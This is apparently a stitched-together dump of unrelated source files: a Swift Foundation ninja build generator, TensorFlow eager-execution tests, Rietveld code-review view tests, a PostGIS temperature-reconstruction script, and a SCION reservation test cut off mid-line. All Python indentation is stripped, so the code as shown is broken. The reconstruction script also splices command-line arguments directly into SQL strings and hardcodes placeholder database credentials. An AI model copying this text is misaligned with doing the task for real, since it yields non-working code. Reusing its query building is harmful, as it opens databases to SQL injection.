c_flags = """
TARGET_CFLAGS = -fcolor-diagnostics -fdollars-in-identifiers -fblocks -fobjc-runtime=macosx-10.11 -fintegrated-as -fPIC --target=${TARGET} """
if Configuration.current.build_mode == Configuration.Debug:
c_flags += "-g -O0 "
elif Configuration.current.build_mode == Configuration.Release:
c_flags += "-O2 "
if Configuration.current.system_root is not None:
c_flags += "--sysroot=${SYSROOT}"
if Configuration.current.bootstrap_directory is not None:
c_flags += """ -I${BOOTSTRAP_DIR}/usr/include -I${BOOTSTRAP_DIR}/usr/local/include """
c_flags += """ -I${TARGET_BOOTSTRAP_DIR}/usr/include -I${TARGET_BOOTSTRAP_DIR}/usr/local/include """
c_flags += Configuration.current.extra_c_flags
swift_flags = "\nTARGET_SWIFTCFLAGS = -I${SDKROOT}/lib/swift/" + Configuration.current.target.swift_sdk_name + " -Xcc -fblocks -resource-dir ${SDKROOT}/lib/swift "
if swift_triple is not None:
swift_flags += "-target ${SWIFT_TARGET} "
if Configuration.current.system_root is not None:
swift_flags += "-sdk ${SYSROOT} "
if Configuration.current.bootstrap_directory is not None:
swift_flags += """ -I${BOOTSTRAP_DIR}/usr/include -I${BOOTSTRAP_DIR}/usr/local/include """
swift_flags += """ -I${TARGET_BOOTSTRAP_DIR}/usr/include -I${TARGET_BOOTSTRAP_DIR}/usr/local/include """
if Configuration.current.build_mode == Configuration.Debug:
swift_flags += "-g -Onone "
elif Configuration.current.build_mode == Configuration.Release:
swift_flags += "-O "
swift_flags += Configuration.current.extra_swift_flags
swift_flags += """
TARGET_SWIFTEXE_FLAGS = -I${SDKROOT}/lib/swift/""" + Configuration.current.target.swift_sdk_name + """ -L${SDKROOT}/lib/swift/""" + Configuration.current.target.swift_sdk_name + """ """
if Configuration.current.build_mode == Configuration.Debug:
swift_flags += "-g -Onone -enable-testing "
elif Configuration.current.build_mode == Configuration.Release:
swift_flags += " "
swift_flags += Configuration.current.extra_swift_flags
ld_flags = """
EXTRA_LD_FLAGS = """ + Configuration.current.extra_ld_flags
ld_flags += """
TARGET_LDFLAGS = --target=${TARGET} ${EXTRA_LD_FLAGS} -L${SDKROOT}/lib/swift/""" + Configuration.current.target.swift_sdk_name + """ """
if Configuration.current.system_root is not None:
ld_flags += "--sysroot=${SYSROOT}"
if Configuration.current.bootstrap_directory is not None:
ld_flags += """ -L${TARGET_BOOTSTRAP_DIR}/usr/lib"""
if Configuration.current.linker is not None:
ld_flags += " -fuse-ld=" + Configuration.current.linker
if Configuration.current.toolchain is not None:
bin_dir = Configuration.current.toolchain
if not os.path.exists(bin_dir.path_by_appending("ld").relative()):
bin_dir = Configuration.current.toolchain.path_by_appending("bin")
c_flags += " -B" + bin_dir.relative()
ld_flags += " -B" + bin_dir.relative()
c_flags += "\n"
swift_flags += "\n"
ld_flags += "\n"
cxx_flags = """
TARGET_CXXFLAGS = -std=gnu++11 -I${SYSROOT}/usr/include/c++/${BINUTILS_VERSION} -I${SYSROOT}/usr/include/${TARGET}/c++/${BINUTILS_VERSION}
"""
ar_flags = """
AR_FLAGS = rcs
"""
flags = variables + verbose_flags + base_flags + c_flags + swift_flags + cxx_flags + ld_flags + ar_flags
cp_command = """
rule Cp
command = mkdir -p `dirname $out`; /bin/cp -r $in $out
description = Cp $in
"""
compilec_command = """
rule CompileC
command = mkdir -p `dirname $out`; ${CLANG} ${TARGET_CFLAGS} $flags ${VERBOSE_FLAGS} -c $in -o $out
description = CompileC: $in
rule CompileCxx
command = mkdir -p `dirname $out`; ${CLANGXX} ${TARGET_CFLAGS} ${TARGET_CXXFLAGS} $flags ${VERBOSE_FLAGS} -c $in -o $out
description = CompileCxx: $in
"""
swiftc_command = """
rule CompileSwift
command = mkdir -p `dirname $out`; mkdir -p ${MODULE_CACHE_PATH}; ${SWIFT} -frontend -c $module_sources ${TARGET_SWIFTCFLAGS} $flags -module-name $module_name -module-link-name $module_name -o $out -emit-module-path $out.~partial.swiftmodule -emit-module-doc-path $out.~partial.swiftdoc -emit-dependencies-path $out.d -emit-reference-dependencies-path $out.swiftdeps -module-cache-path ${MODULE_CACHE_PATH}
description = CompileSwift: $in
depfile = $out.d
rule MergeSwiftModule
command = mkdir -p `dirname $out`; ${SWIFT} -frontend -emit-module $partials ${TARGET_SWIFTCFLAGS} $flags -module-cache-path ${MODULE_CACHE_PATH} -module-link-name $module_name -o $out
description = Merge $out
"""
assembler_command = """
rule Assemble
command = mkdir -p `dirname $out`; ${CLANG} -x assembler-with-cpp -c $in -o $out ${TARGET_CFLAGS} $flags ${VERBOSE_FLAGS}
description = Assemble: $in
"""
link_command = """
rule Link
command = mkdir -p `dirname $out`; ${CLANG} ${TARGET_LDFLAGS} $flags ${VERBOSE_FLAGS} $start $in $end -o $out"""
if Configuration.current.verbose:
link_command += "-Xlinker --verbose"
link_command += """
description = Link: $out
rule Archive
command = mkdir -p `dirname $out`; ${AR} ${AR_FLAGS} $flags $out $in
description = Archive: $out
"""
swift_build_command = """
rule SwiftExecutable
command = mkdir -p `dirname $out`; ${SWIFTC} ${TARGET_SWIFTEXE_FLAGS} ${EXTRA_LD_FLAGS} $flags $in -o $out
description = SwiftExecutable: $out
"""
commands = cp_command + compilec_command + swiftc_command + assembler_command + link_command + swift_build_command
script = flags + commands
for product in self.products:
script += product.generate()
script += """
rule RunReconfigure
command = ./configure --reconfigure
description = Reconfiguring build script.
build ${BUILD_DIR}/.reconfigure: RunReconfigure
build reconfigure: phony | ${BUILD_DIR}/.reconfigure
"""
script += self.extra
script += "\n\n"
return script
def generate_workspaces(self):
build_project_command = """
rule BuildProject
command = pushd $project; ninja; popd
"""
script = build_project_command
for workspace in self.workspaces:
script += workspace.generate()
script += "\n\n"
return script
def generate(self):
script = None
if self.workspaces is None:
script = self.generate_products()
script_file = open(Configuration.current.build_script_path.absolute(), 'w')
script_file.write(script)
script_file.close()
else:
for workspace in self.workspaces:
workspace.configure()
script = self.generate_workspaces()
|
|
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for low-level eager execution primitives."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python import pywrap_tensorflow
from tensorflow.python.eager import backprop
from tensorflow.python.eager import context
from tensorflow.python.eager import core
from tensorflow.python.eager import tape
from tensorflow.python.eager import test
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import resource_variable_ops
class Tests(test.TestCase):
def setUp(self):
# Force-load `distribution_strategy_context` to prevent GC at
# test time. See discussion in cl//219478951.
tape.distribution_strategy_context.get_distribution_strategy()
@test_util.assert_no_new_tensors
@test_util.assert_no_garbage_created
def testFastpathExecute_MatMulCorrectResponse(self):
a_2_by_2 = random_ops.random_uniform((2, 2))
b_2_by_2 = random_ops.random_uniform((2, 2))
a_100_by_784 = random_ops.random_uniform((100, 784))
b_100_by_784 = random_ops.random_uniform((100, 784))
ctx = context.context()
self.assertAllClose(
math_ops.matmul(a_2_by_2, b_2_by_2),
pywrap_tensorflow.TFE_Py_FastPathExecute(
ctx._handle, ctx.device_name, "MatMul", None, None, a_2_by_2,
b_2_by_2, "transpose_a", False, "transpose_b", False))
self.assertAllClose(
math_ops.matmul(a_100_by_784, b_100_by_784, transpose_b=True),
pywrap_tensorflow.TFE_Py_FastPathExecute(
ctx._handle, ctx.device_name, "MatMul", None, None, a_100_by_784,
b_100_by_784, "transpose_a", False, "transpose_b", True))
@test_util.assert_no_new_tensors
@test_util.assert_no_garbage_created
def testFastpathExecute_ResourceVariableMatMulCorrectResponse(self):
ctx = context.context()
a_2_by_2 = constant_op.constant(1.0, shape=[2, 2])
m = resource_variable_ops.ResourceVariable(a_2_by_2)
x = pywrap_tensorflow.TFE_Py_FastPathExecute(
ctx._handle, ctx.device_name, "MatMul", None, None, m, m, "transpose_a",
False, "transpose_b", False)
y = pywrap_tensorflow.TFE_Py_FastPathExecute(
ctx._handle, ctx.device_name, "MatMul", None, None, a_2_by_2, a_2_by_2,
"transpose_a", False, "transpose_b", False)
self.assertAllEqual(x, y)
@test_util.assert_no_new_tensors
@test_util.assert_no_garbage_created
def testFastpathExecute_MixedPrecisionVariableMatMulCorrectResponse(self):
ctx = context.context()
a_2_by_2 = constant_op.constant(1.0, shape=[2, 2])
a_2_by_2_fp16 = math_ops.cast(a_2_by_2, dtype=dtypes.float16)
m = resource_variable_ops.ResourceVariable(a_2_by_2)
m = resource_variable_ops._MixedPrecisionVariable(
m, read_dtype=dtypes.float16)
x = pywrap_tensorflow.TFE_Py_FastPathExecute(
ctx._handle, ctx.device_name, "MatMul", None, None, m, m, "transpose_a",
False, "transpose_b", False)
y = pywrap_tensorflow.TFE_Py_FastPathExecute(
ctx._handle, ctx.device_name, "MatMul", None, None, a_2_by_2_fp16,
a_2_by_2_fp16, "transpose_a", False, "transpose_b", False)
self.assertEqual(x.dtype, dtypes.float16)
self.assertAllEqual(x, y)
@test_util.assert_no_new_tensors
@test_util.assert_no_garbage_created
def testFastpathExecute_TapeWrite(self):
ctx = context.context()
with backprop.GradientTape(persistent=True) as tape:
a_2_by_2 = constant_op.constant(1.0, shape=[2, 2])
tape.watch(a_2_by_2)
z = pywrap_tensorflow.TFE_Py_FastPathExecute(
ctx._handle, ctx.device_name, "MatMul", None, None, a_2_by_2,
a_2_by_2, "transpose_a", False, "transpose_b", False)
dz_dy = tape.gradient(z, [a_2_by_2])[0]
self.assertAllEqual(dz_dy.numpy(),
constant_op.constant(4.0, shape=[2, 2]).numpy())
@test_util.assert_no_new_tensors
@test_util.assert_no_garbage_created
def testFastpathExecute_ResourceVariableTapeWrite(self):
ctx = context.context()
with backprop.GradientTape(persistent=True) as tape:
a_2_by_2 = constant_op.constant(1.0, shape=[2, 2])
m = resource_variable_ops.ResourceVariable(a_2_by_2)
tape.watch(m)
z = pywrap_tensorflow.TFE_Py_FastPathExecute(
ctx._handle, ctx.device_name, "MatMul", None, None, m, m,
"transpose_a", False, "transpose_b", False)
dz_dy = tape.gradient(z, [m])[0]
self.assertAllEqual(dz_dy.numpy(),
constant_op.constant(4.0, shape=[2, 2]).numpy())
@test_util.assert_no_new_tensors
@test_util.assert_no_garbage_created
def testFastpathExecute_MixedPrecisionVariableTapeWrite(self):
ctx = context.context()
with backprop.GradientTape(persistent=True) as tape:
a_2_by_2 = constant_op.constant([[1.0, 2.0], [3.0, 4.0]],
dtype=dtypes.float32)
a_2_by_2_fp16 = math_ops.cast(a_2_by_2, dtype=dtypes.float16)
m1 = resource_variable_ops.ResourceVariable(a_2_by_2)
m2 = resource_variable_ops._MixedPrecisionVariable(
m1, read_dtype=dtypes.float16)
tape.watch(m2)
z = pywrap_tensorflow.TFE_Py_FastPathExecute(
ctx._handle, ctx.device_name, "MatMul", None, None, a_2_by_2_fp16, m2,
"transpose_a", False, "transpose_b", False)
dz_dy = tape.gradient(z, [m2])[0]
self.assertEqual(dz_dy.dtype, dtypes.float16)
expected_grads = math_ops.matmul(
array_ops.transpose(a_2_by_2_fp16),
constant_op.constant(1., shape=[2, 2], dtype=dtypes.float16)).numpy()
self.assertAllEqual(dz_dy.numpy(), expected_grads)
# Tests homogeneous list op
@test_util.assert_no_new_tensors
@test_util.assert_no_garbage_created
def testFastpathExecute_AddNCorrectResponse(self):
ctx = context.context()
a_2_by_2 = random_ops.random_uniform((2, 2))
b_2_by_2 = random_ops.random_uniform((2, 2))
self.assertAllClose(
math_ops.add_n([a_2_by_2, b_2_by_2]),
pywrap_tensorflow.TFE_Py_FastPathExecute(ctx._handle, ctx.device_name,
"AddN", None, None,
[a_2_by_2, b_2_by_2]))
# Tests homogeneous list op
@test_util.assert_no_new_tensors
@test_util.assert_no_garbage_created
def testFastpathExecute_AddNTapeWrite(self):
ctx = context.context()
a_2_by_2 = random_ops.random_uniform((2, 2))
b_2_by_2 = random_ops.random_uniform((2, 2))
with backprop.GradientTape(persistent=True) as tape:
tape.watch(a_2_by_2)
tape.watch(b_2_by_2)
z1 = pywrap_tensorflow.TFE_Py_FastPathExecute(
ctx._handle, ctx.device_name, "AddN", None, None,
[a_2_by_2, b_2_by_2])
z2 = math_ops.add_n([a_2_by_2, b_2_by_2])
dz1_dy = tape.gradient(z1, [a_2_by_2])[0]
dz2_dy = tape.gradient(z2, [a_2_by_2])[0]
self.assertAllEqual(dz1_dy.numpy(), dz2_dy.numpy())
# Tests heterogeneous list op
@test_util.assert_no_new_tensors
@test_util.assert_no_garbage_created
def testFastpathExecute_IdentityNCorrectResponse(self):
ctx = context.context()
a_2_by_2 = random_ops.random_uniform((2, 2))
b_2_by_2 = random_ops.random_uniform((2, 2))
self.assertAllClose(
array_ops.identity_n([a_2_by_2, b_2_by_2]),
pywrap_tensorflow.TFE_Py_FastPathExecute(ctx._handle, ctx.device_name,
"IdentityN", None, None,
[a_2_by_2, b_2_by_2]))
# Tests heterogeneous list op
@test_util.assert_no_new_tensors
@test_util.assert_no_garbage_created
def testFastpathExecute_IdentityNTapeWrite(self):
ctx = context.context()
a_2_by_2 = random_ops.random_uniform((2, 2))
b_2_by_2 = random_ops.random_uniform((2, 2))
with backprop.GradientTape(persistent=True) as tape:
tape.watch(a_2_by_2)
tape.watch(b_2_by_2)
z1 = pywrap_tensorflow.TFE_Py_FastPathExecute(
ctx._handle, ctx.device_name, "IdentityN", None, None,
[a_2_by_2, b_2_by_2])
z2 = array_ops.identity_n([a_2_by_2, b_2_by_2])
dz1_dy = tape.gradient(z1[0], [a_2_by_2])[0]
dz2_dy = tape.gradient(z2[0], [a_2_by_2])[0]
self.assertAllEqual(dz1_dy.numpy(), dz2_dy.numpy())
@test_util.assert_no_new_tensors
@test_util.assert_no_garbage_created
def testFastpathExecute_InvalidInputs(self):
a_2_by_2 = random_ops.random_uniform((2, 2))
ctx = context.context()
assert ctx.executing_eagerly(
), "The prototype doesn't contain C code for graph construction"
ctx_handle = ctx._handle # pylint: disable=protected-access
# Not enough base params
with self.assertRaisesRegexp(ValueError,
"at least 5 items in the input tuple"):
pywrap_tensorflow.TFE_Py_FastPathExecute(ctx_handle, ctx.device_name,
"Identity")
# Not enough inputs
with self.assertRaisesRegexp(ValueError,
"Expected to be at least 6, was 5"):
pywrap_tensorflow.TFE_Py_FastPathExecute(ctx_handle, ctx_handle,
"Identity", None, [])
# Bad type
with self.assertRaisesRegexp(TypeError, "expected a string for op_name"):
pywrap_tensorflow.TFE_Py_FastPathExecute(ctx_handle, ctx.device_name,
ctx_handle, None, [], a_2_by_2)
@test_util.assert_no_new_tensors
@test_util.assert_no_garbage_created
def testFastPathExecute_InvalidAttributes(self):
split_dim = constant_op.constant(0, dtype=dtypes.int32)
value = constant_op.constant([0, 1, 2, 3], dtype=dtypes.float32)
ctx = context.context()
ctx_handle = ctx._handle
with self.assertRaises(core._FallbackException):
pywrap_tensorflow.TFE_Py_FastPathExecute(ctx_handle, ctx.device_name,
"Split", None, None, split_dim,
value, "num_split", -1)
@test_util.assert_no_new_tensors
@test_util.assert_no_garbage_created
def testInvalidNumOutputs(self):
with self.assertRaisesRegexp(
Exception,
"Value for attr 'num_split' of -1 must be at least minimum 1"):
array_ops.split(value=[1, 2, 3], num_or_size_splits=-1)
if __name__ == "__main__":
test.main()
|
|
#!/usr/bin/env python
# Copyright 2011 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for view functions and helpers."""
import datetime
import json
import unittest
import setup
setup.process_args()
from django.http import HttpRequest
from google.appengine.api.users import User
from google.appengine.ext import ndb
from utils import TestCase, load_file
from codereview import models, views
from codereview import engine # engine must be imported after models :(
class MockRequest(HttpRequest):
"""Mock request class for testing."""
def __init__(self, user=None, issue=None):
super(MockRequest, self).__init__()
self.META['HTTP_HOST'] = 'testserver'
self.user = user
self.issue = issue
class TestPublish(TestCase):
"""Test publish functions."""
def setUp(self):
super(TestPublish, self).setUp()
self.user = User('[email protected]')
self.login('[email protected]')
self.issue = models.Issue(subject='test')
self.issue.local_base = False
self.issue.put()
self.ps = models.PatchSet(parent=self.issue.key, issue_key=self.issue.key)
self.ps.data = load_file('ps1.diff')
self.ps.put()
self.patches = engine.ParsePatchSet(self.ps)
ndb.put_multi(self.patches)
def test_draft_details_no_base_file(self):
request = MockRequest(User('[email protected]'), issue=self.issue)
# add a comment and render
cmt1 = models.Comment(
patch_key=self.patches[0].key, parent=self.patches[0].key)
cmt1.text = 'test comment'
cmt1.lineno = 1
cmt1.left = False
cmt1.draft = True
cmt1.author = self.user
cmt1.put()
# Add a second comment
cmt2 = models.Comment(
patch_key=self.patches[1].key, parent=self.patches[1].key)
cmt2.text = 'test comment 2'
cmt2.lineno = 2
cmt2.left = False
cmt2.draft = True
cmt2.author = self.user
cmt2.put()
# Add fake content
content1 = models.Content(text="foo\nbar\nbaz\nline\n")
content1.put()
content2 = models.Content(text="foo\nbar\nbaz\nline\n")
content2.put()
cmt1_patch = cmt1.patch_key.get()
cmt1_patch.content_key = content1.key
cmt1_patch.put()
cmt2_patch = cmt2.patch_key.get()
cmt2_patch.content_key = content2.key
cmt2_patch.put()
# Mock get content calls. The first fails with an FetchError,
# the second succeeds (see issue384).
def raise_err():
raise models.FetchError()
cmt1.patch_key.get().get_content = raise_err
cmt2.patch_key.get().get_patched_content = lambda: content2
_, comments = views._get_draft_comments(request, self.issue)
self.assertEqual(len(comments), 2)
# Try to render draft details using the patched Comment
# instances from here.
views._get_draft_details(request, [cmt1, cmt2])
class TestSearch(TestCase):
def setUp(self):
"""Create two test issues and users."""
super(TestSearch, self).setUp()
user = User('[email protected]')
models.Account.get_account_for_user(user)
user = User('[email protected]')
models.Account.get_account_for_user(user)
self.user = User('[email protected]')
self.login('[email protected]')
issue1 = models.Issue(subject='test')
issue1.reviewers = ['[email protected]',
'[email protected]']
issue1.local_base = False
issue1.put()
issue2 = models.Issue(subject='test')
issue2.reviewers = ['[email protected]',
'[email protected]']
issue2.local_base = False
issue2.put()
def test_json_get_api(self):
today = datetime.date.today()
start = datetime.datetime(today.year, today.month, 1)
next_month = today + datetime.timedelta(days=31)
end = datetime.datetime(next_month.year, next_month.month, 1)
# This search is derived from a real query that comes up in the logs
# quite regulary. It searches for open issues with a test group as
# reviewer within a month and requests the returned data to be encoded
# as JSON.
response = self.client.get('/search', {
'closed': 3, 'reviewer': '[email protected]',
'private': 1, 'created_before': str(end),
'created_after': str(start), 'order': 'created',
'keys_only': False, 'with_messages': False, 'cursor': '',
'limit': 1000, 'format': 'json'
})
self.assertEqual(response.status_code, 200)
self.assertEqual(response['Content-Type'],
'application/json; charset=utf-8')
payload = json.loads(response.content)
self.assertEqual(len(payload['results']), 1)
class TestModifierCount(TestCase):
"""Test modifier counts for the latest patchset."""
def line_count(self, lines):
if lines == 1:
return ''
return ",%d", lines
def makePatch(self, add_lines, remove_lines):
patch = (
"Index: cc/layers/layer.cc\n"
"==============================="
"====================================\n"
"--- a/cc/layers/layer.cc\n"
"+++ b/cc/layers/layer.cc\n"
"@@ -905%s +904%s @@"
" void Layer::PushPropertiesTo(LayerImpl* layer) {\n") % (
(self.line_count(add_lines),
self.line_count(remove_lines)))
for _ in xrange(remove_lines):
patch += "-base::Passed(&original_request)));\n"
for _ in xrange(add_lines):
patch += "+base::Passed(&new_request)));\n"
return patch
def setUp(self):
super(TestModifierCount, self).setUp()
self.user = User('[email protected]')
self.login('[email protected]')
def test_empty_patch(self):
issue = models.Issue(subject="test with 0 lines")
issue.local_base = False
issue.put()
added, removed = views._get_modified_counts(issue)
self.assertEqual(0, added)
self.assertEqual(0, removed)
def test_add_patch(self):
issue = models.Issue(subject="test with 1 line removed")
issue.local_base = False
issue.put()
ps = models.PatchSet(parent=issue.key, issue_key=issue.key)
ps.data = self.makePatch(1, 0)
ps.put()
patches = engine.ParsePatchSet(ps)
ndb.put_multi(patches)
added, removed = views._get_modified_counts(issue)
self.assertEqual(1, added)
self.assertEqual(0, removed)
def test_remove_patch(self):
issue = models.Issue(subject="test with 1 line removed")
issue.local_base = False
issue.put()
ps = models.PatchSet(parent=issue.key, issue_key=issue.key)
ps.data = self.makePatch(0, 1)
ps.put()
patches = engine.ParsePatchSet(ps)
ndb.put_multi(patches)
added, removed = views._get_modified_counts(issue)
self.assertEqual(0, added)
self.assertEqual(1, removed)
def test_both_patch(self):
issue = models.Issue(subject="test with changes")
issue.local_base = False
issue.put()
ps = models.PatchSet(parent=issue.key, issue_key=issue.key)
ps.data = self.makePatch(5, 7)
ps.put()
patches = engine.ParsePatchSet(ps)
ndb.put_multi(patches)
added, removed = views._get_modified_counts(issue)
self.assertEqual(5, added)
self.assertEqual(7, removed)
if __name__ == '__main__':
unittest.main()
|
|
#!/bin/python
# -*- coding: utf-8 -*-
"""
Reconstructs temperature fields based on selected indexfields regression data from db
TODO: Work in progress! Implement try and excepts, substitute hardcoded dimensions (81,161)
Created on Mon May 11 23:00:15 2015
@author: Manuel Beck
"""
"""
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# LIBRARIES:
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
"""
import numpy as np
import h5py
from sklearn.preprocessing import scale
import psycopg2
import sys
import os
# debug show full numpy array
np.set_printoptions(threshold='nan')
"""
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# FUNCTIONS:
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
"""
# import postgres interaction functions
from postgresInt import sendDbQuery, getPgData, getPgRast, geotiff2psql
# import regmod statistic functions and main reconstruct function
from pcaStats import pca, mlr, reconstruct
# import numpy 2 geotiff converting function
from np2geotiff import numpy2geotiff
# import command line arguments validator
from argvValidate import validateArgv
"""
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# CONFIGURATION:
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
"""
# path and name of hdf5 cru maps file
hdf5PATH = '/CRU/mSelInCol_'
# db credentials
dbHost = "localhost"
dbName = "myDBName"
dbUser = "myUser"
dbPass = "myPassword"
"""
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# RUN:
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
"""
# validate user input
validateArgv(sys.argv[1:])
# define db connection string
conn = psycopg2.connect("host="+dbHost+" dbname="+dbName+" user="+dbUser+" password="+dbPass)
# get command line arguments
year = sys.argv[1]
month = sys.argv[2]
evIdsList = [int(arg) for arg in sys.argv[3:]]
evIdsStr = ", ".join(sys.argv[3:])
# get mean std map for month
query = "Select ST_DUMPVALUES(rast) From temperature_cru_std WHERE month = " + str(month) + ";"
cruMapStd = getPgRast(conn, query)
# calculate stdmap overall size cause all raster data are trimed and has to be set to the same extend for calculation
bboxExtent = cruMapStd.shape
# get region_rep => max raster of all carresponding correlation rasters
# change to event id in for visible index points
query = """SELECT ST_DUMPVALUES(ST_Union(f.rast, 'MAX'))
FROM (SELECT ST_UNION(rast,'MAX') as rast
FROM temperature_monthly_regio_weight
WHERE event_id IN(""" + evIdsStr + """)
UNION ALL
SELECT ST_MAKEEMPTYRASTER(rast) as rast
FROM temperature_cru_mean
WHERE month=1) As f"""
regionRepr = getPgRast(conn, query)
#query = "Select (ST_METADATA(ST_UNION(rast,'MAX'))).*, ST_DUMPVALUES(ST_UNION(rast,'MAX')) From temperature_monthly_regio_weight WHERE event_id IN(" + evIdsStr + ");"
#metadata = getPgRast(conn, query, True, bboxExtent)
# get indices_recon
query = """SELECT ST_DUMPVALUES(ST_Union(f.rast, 'MAX'))
FROM (SELECT ST_UNION(rast,'MEAN') as rast
FROM temperature_monthly_regio_idxrec
WHERE event_id IN(""" + evIdsStr + """)
UNION ALL
SELECT ST_MAKEEMPTYRASTER(rast) as rast
FROM temperature_cru_mean
WHERE month=1) As f"""
#query = "Select (ST_METADATA(ST_UNION(rast,'MEAN'))).*, ST_DUMPVALUES(ST_UNION(rast,'MEAN')) From temperature_monthly_regio_idxrec WHERE event_id IN(" + evIdsStr + ");"
#indicesRecon = getPgRast(conn, query, True, bboxExtent)
indicesRecon = getPgRast(conn, query)
# get weighting
query = """SELECT ST_DUMPVALUES(ST_Union(f.rast, 'MAX'))
FROM (SELECT ST_UNION(rast,'MEAN') as rast
FROM temperature_monthly_regio_weight
WHERE event_id IN(""" + evIdsStr + """)
UNION ALL
SELECT ST_MAKEEMPTYRASTER(rast) as rast
FROM temperature_cru_mean
WHERE month=1) As f"""
#query = "Select (ST_METADATA(ST_UNION(rast,'MEAN'))).*, ST_DUMPVALUES(ST_UNION(rast,'MEAN')) From temperature_monthly_regio_weight WHERE event_id IN(" + evIdsStr + ");"
#weighting = getPgRast(conn, query, True, bboxExtent)
weighting = getPgRast(conn, query)
# get cru maps in columns for month
# get absolute file path
__location__ = os.path.realpath(
os.path.join(os.getcwd(), os.path.dirname(__file__)))
# set path
hdf5 = __location__ + hdf5PATH + str(month) + ".hdf5"
# read file
file = h5py.File(hdf5, 'r')
# select dataset
dataset = file['cru_data']
mSelCol = dataset[()]
file.close()
# transform region_repr map to column vector
regionReprInCol = regionRepr.reshape(regionRepr.shape[0]*regionRepr.shape[1],1)
# Test
# print np.where(~np.isnan(regionReprInCol))
# get scoredata
mask = ~np.isnan(regionReprInCol)[:,0]
scoredata = mSelCol[:,mask].T
# scale and center data (has minimal offset in mean to R/Matlab => floating point 10^-17)
zscore = scale(scoredata, axis= 0, with_mean=True, with_std=True, copy=False).T
# get indices
# query = "Select ST_DUMPVALUES(ST_UNION(rast,'MEAN')) From temperature_recon_idx_4_pca WHERE year = " + str(year) + " and month = " + str(month) + " and event_id IN(" + evIdsStr + ");"
# indicesRecon = getPgRast(conn, query)
indicesRecon = indicesRecon/weighting
# reconstruct temperature field
reconstructed = reconstruct(zscore, regionReprInCol, indicesRecon, mSelCol, cruMapStd)
# trim array to only data extend
# only data extend
#reconstructed[0][0]=15
ymin = min(np.where(~np.isnan(reconstructed))[0])-1
ymax = max(np.where(~np.isnan(reconstructed))[0])+2
xmin = min(np.where(~np.isnan(reconstructed))[1])-1
xmax = max(np.where(~np.isnan(reconstructed))[1])+2
padding = 2
print 'pad'
print reconstructed[0][0]
#print np.where(~np.isnan(reconstructed))[1]
print xmin, xmax, ymin, ymax
# prepare global data array
a = np.empty(((ymax-ymin)+padding,(xmax-xmin)+padding,))
a[:] = np.nan
print reconstructed.shape
print reconstructed[ymin:ymax,xmin:xmax].shape
#a[padding/2:(ymax-ymin)+padding/2,padding/2:(xmax-xmin)+padding/2]=reconstructed[ymin:ymax,xmin:xmax]
a=reconstructed[ymin:ymax,xmin:xmax]
#print ymin, ymax,xmin,xmax
yscale = 0.493827160493827
xscale = 0.496894409937888
yscale = 0.493827160493827
xscale = 0.496894409937888
print 'scale'
print yscale, xscale
Yminb = ((yscale*(ymin-padding/2))+30)
Ymaxb = ((yscale*(ymax+padding/2))+30)
Xminb = ((xscale*(xmin-padding/2))-30)
Xmaxb = ((xscale*(xmax+padding/2))-30)
Yminb = ((yscale*(ymin))+30)
Ymaxb = ((yscale*(ymax))+30)
Xminb = ((xscale*(xmin))-30)
Xmaxb = ((xscale*(xmax))-30)
# image min/max lat and lon
lat = np.array(( Yminb, Ymaxb )) #y
lon = np.array(( Xminb, Xmaxb )) #x
#print lat
#print lon
a[np.isnan(a)] = 9999
# set no data value
reconstructed[np.isnan(reconstructed)] = 9999
a=reconstructed
#print reconstructed.shape
import sys
#sys.exit("Error message")
#lat = np.array(( 30, 70 ))
#lon = np.array(( -30.0, 50.0 ))
# create geotiff
#numpy2geotiff(reconstructed, lat, lon)
numpy2geotiff(a, lat, lon)
# write geotiff to postgres and return event hash for php postgres query
geotiff2psql(conn, year, month, evIdsStr)
# close db connection
conn.close()
# return event hash for php postres query at [4] cause php can only fetch print and gdal prints also success
# on file creation and upload to stdout
#print evHash
|
|
# Copyright 2016 ETH Zurich
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
:mod:`reservation_test` --- lib.sibra.state.reservation unit tests
==================================================================
"""
# Stdlib
from unittest.mock import patch
# External packages
import nose
import nose.tools as ntools
# SCION
from lib.sibra.state.reservation import ReservationBase, SteadyReservation
from lib.sibra.util import BWSnapshot
from test.testcommon import create_mock
class ReservationBaseTesting(ReservationBase):
MAX_TICKS = 4
RESV_TYPE = "resv type"
class TestReservationBaseAdd(object):
"""
Unit tests for lib.sibra.state.reservation.ReservationBase.add
"""
@patch("lib.sibra.state.reservation.BWSnapshot", autospec=True)
@patch("lib.sibra.state.reservation.logging", autospec=True)
@patch("lib.sibra.state.reservation.BandwidthBase.__init__", autospec=True,
